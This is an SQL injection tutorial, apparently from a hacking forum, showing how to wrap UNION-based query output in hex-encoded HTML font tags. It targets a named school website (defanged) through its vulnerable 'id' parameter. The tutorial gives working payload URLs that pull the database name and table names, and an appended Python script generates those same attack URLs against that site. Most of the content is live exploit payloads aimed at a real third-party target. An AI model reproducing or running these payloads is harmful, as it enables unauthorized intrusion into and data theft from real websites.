ADDING HTML IN SQL INJECTION ( SQLI FUN )

Introduction:

In this tutorial I will show you how to add HTML tags and formatting to the output of your SQL injection queries.


[Image: folder_HTML.png]


Purpose:


-----> By wrapping the data our SQLi query returns in HTML tags, we can arrange the output on the page in a readable way.

-----> Sometimes the result of our query ends up somewhere awkward: only in the page source (inside an attribute or a comment), in the <title>, or in a tiny font. In those cases we add HTML tags around the data so the browser renders it prominently on the page. Note that this only helps when the data is reflected into the HTML body; output that appears only in a URL or an HTTP header is not rendered by the browser and the tags will not help there.





-----> And, as you can see, I like colours and decoration. A lot.


Tutorial: 


First of all, I assume you have a sound knowledge of SQL injection and basic HTML.

For this tutorial, the site I'm going to inject is:


hxxp://www.dbhspgoa.edu.in


Here is the vulnerable link. The 'id' parameter is injectable with a very simple SQLi:


hxxp://dbhspgoa.edu.in/Article.php?id=92


So let's start with a basic UNION-based injection. The 'and 0' makes the original WHERE clause false, so the page renders our UNION row instead of the real article, and a quick column count shows there are 9 columns here:


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9--


[Image: makht1.JPG]

I will inject into the 4th column, so let's get the database name there:


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(database()),5,6,7,8,9--


[Image: mkdb.JPG]

Now look at the database name. It is visible on the rendered page itself (not just in the source), but the font size is very small and hard to read.

Now, let me show you the wonders of HTML tags.

We can always add HTML to our SQLi query. Sometimes we can write the tags directly as string literals, enclosed in single quotes, like:



concat ('<opening_tags>', QUERY , '<closing_tags>')


But most of the time this syntax is not allowed, typically because the application escapes or filters quote characters, so we convert our HTML tags to HEX instead, like:


concat(0xHEX_value_of_opening_tag , QUERY , 0xHEX_value_of_closing_tag)





Notice the 0x prefix. In MySQL a 0x-prefixed hexadecimal literal is a binary string, so the server treats the bytes it encodes exactly like a quoted string, and no quote character has to appear anywhere in the payload.



The following examples show the basic usage of these tags. From there you can use your own creativity and imagination.




Example 1:




Let's start with the HTML <font> tag.




Usage: <font size="8" color="red"> MakMan </font>




I'm going to use this tag in our query, but this website does not allow HTML tags directly, so we have to convert them to HEX first. Just follow the syntax above.


Now my format should be:


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(0xHEX_value_of_opening_tag,database(),0xHEX_value_of_closing_tag),5,6,7,8,9--


To convert to HEX you can use many online tools; just google "String to HEX converter". What you want is the hex of the ASCII bytes of the tag, written as one continuous string with no spaces.
After converting my opening and closing tags, in this case:




Opening_tag = <font size="8" color="red"> ---- HEX ---> 3c666f6e742073697a653d22382220636f6c6f723d22726564223e




Closing_tag = </font> ---- HEX ---> 3c2f666f6e743e





Putting these HEX values into my format, my query becomes:





hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(0x3c666f6e742073697a653d22382220636f6c6f723d22726564223e,database(),0x3c2f666f6e743e),5,6,7,8,9--





Look at the result now. Sweet.

[Image: dbcol.JPG]




Example 2:


Most people like to write their handle next to the query output in SQL injection. Let's try that.

Creativity has no boundaries.

My HTML syntax before converting to HEX (shown only so you can see what I'm doing; it will not work as-is, you have to convert it to HEX):


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x<br><font face='calibri' size="5" color="green">MakMan ---></font><font face='Impact' size="4" color="red">,table_name,0x</font>),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--


My HTML Syntax after converting it to HEX:


hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x3c62723e3c666f6e7420666163653d2763616c69627269272073697a653d22352220636f6c6f723d22677265656e223e4d616b4d616e202d2d2d3e3c2f666f6e743e3c666f6e7420666163653d27496d70616374272073697a653d22342220636f6c6f723d22726564223e,table_name,0x3c2f666f6e743e),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
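As an added example (my own code, not part of the original tutorial), here is a small Python helper that replaces the online converter: it hex-encodes the tags the same way MySQL reads a 0x literal, assembles the Example 1 and Example 2 payloads for the 9-column layout used above, and decodes a payload back so you can read what markup a 0x literal hides. The host, path, column layout and tags are the ones from this tutorial (URLs stay defanged with hxxp, as written above); the function names are assumptions of mine.

```python
"""Hex-encode HTML tags for MySQL UNION payloads and decode them back.

Added example, not from the original tutorial.  The host, path, 9-column
layout and the tags are the ones used above; function names are mine.
URLs are kept defanged (hxxp) exactly as the tutorial writes them.
"""
import re

EXAMPLE_BASE = "hxxp://dbhspgoa.edu.in/Article.php?id=92"  # defanged, as in the tutorial

# Tags from Example 1 and Example 2 above.
FONT_OPEN = '<font size="8" color="red">'
FONT_CLOSE = "</font>"
NAME_OPEN = ('<br><font face=\'calibri\' size="5" color="green">MakMan ---></font>'
             '<font face=\'Impact\' size="4" color="red">')


def to_mysql_hex(text: str) -> str:
    """Return a MySQL hex literal (0x...) for the UTF-8 bytes of `text`.

    MySQL treats 0x... as a binary string, so it can stand in for a quoted
    string literal without any quote character appearing in the payload.
    """
    return "0x" + text.encode("utf-8").hex()


def wrap(expr: str, opening: str, closing: str, aggregate: str = "concat") -> str:
    """concat(<hex open>, expr, <hex close>); pass aggregate='group_concat'
    to get the per-row variant from Example 2."""
    return f"{aggregate}({to_mysql_hex(opening)},{expr},{to_mysql_hex(closing)})"


def build_union(ncols: int, target_col: int, expr: str, tail: str = "") -> str:
    """UNION SELECT with `expr` in column `target_col` (1-based) and numeric
    markers in the others.  'and 0' falsifies the original WHERE clause so the
    page renders our UNION row instead of the real article.  `tail` is an
    optional FROM/WHERE clause for the UNION's own SELECT."""
    if not 1 <= target_col <= ncols:
        raise ValueError("target_col out of range")
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[target_col - 1] = expr
    sql = "and 0 UNION SELECT " + ",".join(cols)
    if tail:
        sql += " " + tail
    return sql + "--"


def to_url(base: str, sql: str) -> str:
    """Append the payload to the vulnerable parameter, writing spaces as '+'
    the way the tutorial's URLs do (the rest is left readable, not percent-encoded)."""
    return base + "+" + sql.replace(" ", "+")


_HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def decode_hex_literals(payload: str) -> str:
    """Inverse direction: replace every 0x... literal with the text it encodes.

    Useful when reading a request in an access log: it shows the markup the
    hex hides.  Odd-length literals are not valid byte strings and are left as-is."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        return bytes.fromhex(digits).decode("utf-8", errors="replace")
    return _HEX_LITERAL.sub(repl, payload)


def example1_url() -> str:
    """Example 1: database name wrapped in a big red <font>."""
    return to_url(EXAMPLE_BASE, build_union(9, 4, wrap("database()", FONT_OPEN, FONT_CLOSE)))


def example2_url() -> str:
    """Example 2: every table name on its own line, prefixed with the handle."""
    expr = wrap("table_name", NAME_OPEN, FONT_CLOSE, aggregate="group_concat")
    tail = "from information_schema.tables where table_schema=database()"
    return to_url(EXAMPLE_BASE, build_union(9, 4, expr, tail))


if __name__ == "__main__":
    for url in (example1_url(), example2_url()):
        print(url)
        print("  decodes to:", decode_hex_literals(url))
```

Two caveats worth keeping in mind when you decorate output this way: the markup around each row counts toward MySQL's group_concat_max_len (1024 bytes by default), so the heavier the decoration around table_name, the fewer table names survive before the output is silently truncated; and hex doubles the length of every tag in the URL, which matters on servers that cap the request-line length.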